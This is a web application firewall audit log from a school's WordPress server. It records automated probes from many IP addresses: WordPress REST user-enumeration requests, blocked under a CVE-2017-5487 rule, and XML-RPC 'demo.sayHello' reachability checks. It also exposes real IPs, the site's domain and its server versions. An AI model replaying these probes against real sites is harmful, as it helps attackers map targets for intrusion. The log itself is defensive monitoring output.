"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664316556311 3059 (- - -) Stopwatch2: 1746664316556311 3059; combined=1298, p1=434, p2=827, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e5e3f23-Z-- --57111f38-A-- [08/May/2025:07:32:03 +0700] aBv7g6cs1DvJ_HgMHE_xgAAAABM 103.236.140.4 41944 103.236.140.4 8181 --57111f38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --57111f38-C-- demo.sayHello --57111f38-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57111f38-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664323478509 6943 (- - -) Stopwatch2: 1746664323478509 6943; combined=4994, p1=735, p2=4008, p3=38, p4=43, p5=101, sr=137, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57111f38-Z-- --eee5c356-A-- [08/May/2025:07:32:19 +0700] aBv7kys5rYyn3jlLjjK-uwAAAM8 103.236.140.4 41950 103.236.140.4 8181 --eee5c356-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eee5c356-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eee5c356-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664339675615 3242 (- - -) Stopwatch2: 1746664339675615 3242; combined=1432, p1=487, p2=912, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eee5c356-Z-- --a0cb652e-A-- [08/May/2025:07:32:27 +0700] aBv7m44K347NtBcwXKwFWAAAAIg 103.236.140.4 41954 103.236.140.4 8181 --a0cb652e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a0cb652e-C-- demo.sayHello --a0cb652e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0cb652e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664347785146 5189 (- - -) Stopwatch2: 1746664347785146 5189; combined=3913, p1=499, p2=3206, p3=26, p4=27, p5=91, sr=69, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0cb652e-Z-- --6c2aba12-A-- [08/May/2025:07:33:42 +0700] aBv75o4K347NtBcwXKwFWgAAAIk 103.236.140.4 41962 103.236.140.4 8181 --6c2aba12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6c2aba12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c2aba12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664422435361 2437 (- - -) Stopwatch2: 1746664422435361 2437; combined=1101, p1=341, p2=734, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c2aba12-Z-- --196f5761-A-- [08/May/2025:07:33:44 +0700] aBv76I4K347NtBcwXKwFWwAAAI0 103.236.140.4 41964 103.236.140.4 8181 --196f5761-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.95 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --196f5761-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --196f5761-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664424457664 2284 (- - -) Stopwatch2: 1746664424457664 2284; combined=1069, p1=321, p2=722, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --196f5761-Z-- --280ada29-A-- [08/May/2025:07:33:48 +0700] aBv77Cs5rYyn3jlLjjK-vwAAANY 103.236.140.4 41970 103.236.140.4 8181 --280ada29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.95 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --280ada29-C-- demo.sayHello --280ada29-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --280ada29-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664428946601 5634 (- - -) Stopwatch2: 1746664428946601 5634; combined=4129, p1=579, p2=3328, p3=32, p4=36, p5=92, sr=79, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --280ada29-Z-- --c55cdb4d-A-- [08/May/2025:07:33:50 +0700] aBv77is5rYyn3jlLjjK-wAAAANQ 103.236.140.4 41972 103.236.140.4 8181 --c55cdb4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c55cdb4d-C-- demo.sayHello --c55cdb4d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c55cdb4d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664430783894 5372 (- - -) Stopwatch2: 1746664430783894 5372; combined=4025, p1=527, p2=3283, p3=29, p4=33, p5=91, sr=79, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c55cdb4d-Z-- --f1937661-A-- [08/May/2025:07:34:43 +0700] aBv8Iys5rYyn3jlLjjK-xAAAAME 103.236.140.4 41980 103.236.140.4 8181 --f1937661-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f1937661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1937661-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664483089761 3226 (- - -) Stopwatch2: 1746664483089761 3226; combined=1426, p1=498, p2=896, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1937661-Z-- --1dc50724-A-- [08/May/2025:07:34:44 +0700] aBv8JI4K347NtBcwXKwFXAAAAJQ 103.236.140.4 41982 103.236.140.4 8181 --1dc50724-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1dc50724-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dc50724-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664484476631 1985 (- - -) Stopwatch2: 1746664484476631 1985; combined=947, p1=331, p2=590, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dc50724-Z-- --e86cb921-A-- [08/May/2025:07:34:45 +0700] aBv8JSs5rYyn3jlLjjK-xQAAANM 103.236.140.4 41984 103.236.140.4 8181 --e86cb921-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e86cb921-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e86cb921-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664485940368 1930 (- - -) Stopwatch2: 1746664485940368 1930; combined=976, p1=308, p2=642, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e86cb921-Z-- --cdd0291a-A-- [08/May/2025:07:34:48 +0700] aBv8KKcs1DvJ_HgMHE_xggAAAA8 103.236.140.4 41992 103.236.140.4 8181 --cdd0291a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cdd0291a-C-- demo.sayHello --cdd0291a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdd0291a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664488605694 4924 (- - -) Stopwatch2: 1746664488605694 4924; combined=3768, p1=504, p2=3045, p3=23, p4=24, p5=99, sr=114, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdd0291a-Z-- --9328265e-A-- [08/May/2025:07:34:50 +0700] aBv8Kis5rYyn3jlLjjK-yAAAAMs 103.236.140.4 41994 103.236.140.4 8181 --9328265e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.29 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9328265e-C-- demo.sayHello --9328265e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9328265e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664490086361 5134 (- - -) Stopwatch2: 1746664490086361 5134; combined=3770, p1=439, p2=3118, p3=28, p4=28, p5=92, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9328265e-Z-- --97ca7c47-A-- [08/May/2025:07:34:50 +0700] aBv8Kis5rYyn3jlLjjK-yQAAAMg 103.236.140.4 41996 103.236.140.4 8181 --97ca7c47-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --97ca7c47-C-- demo.sayHello --97ca7c47-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --97ca7c47-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664490345709 5296 (- - -) Stopwatch2: 1746664490345709 5296; combined=4059, p1=523, p2=3272, p3=29, p4=32, p5=121, sr=77, sw=82, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97ca7c47-Z-- --c058f62a-A-- [08/May/2025:07:35:49 +0700] aBv8ZcP9GxxPAbCroFbMkwAAAE8 103.236.140.4 42008 103.236.140.4 8181 --c058f62a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c058f62a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c058f62a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664549311111 3249 (- - -) Stopwatch2: 1746664549311111 3249; combined=1432, p1=507, p2=893, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c058f62a-Z-- --1851442d-A-- [08/May/2025:07:35:56 +0700] aBv8bCs5rYyn3jlLjjK-zQAAAM4 103.236.140.4 42016 103.236.140.4 8181 --1851442d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1851442d-C-- demo.sayHello --1851442d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1851442d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664556362664 5971 (- - -) Stopwatch2: 1746664556362664 5971; combined=4415, p1=569, p2=3586, p3=35, p4=31, p5=121, sr=82, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1851442d-Z-- --b31ae03d-A-- [08/May/2025:07:36:25 +0700] aBv8iSs5rYyn3jlLjjK-zgAAAMQ 103.236.140.4 42022 103.236.140.4 8181 --b31ae03d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b31ae03d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b31ae03d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664585660479 3142 (- - -) Stopwatch2: 1746664585660479 3142; combined=1288, p1=433, p2=819, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
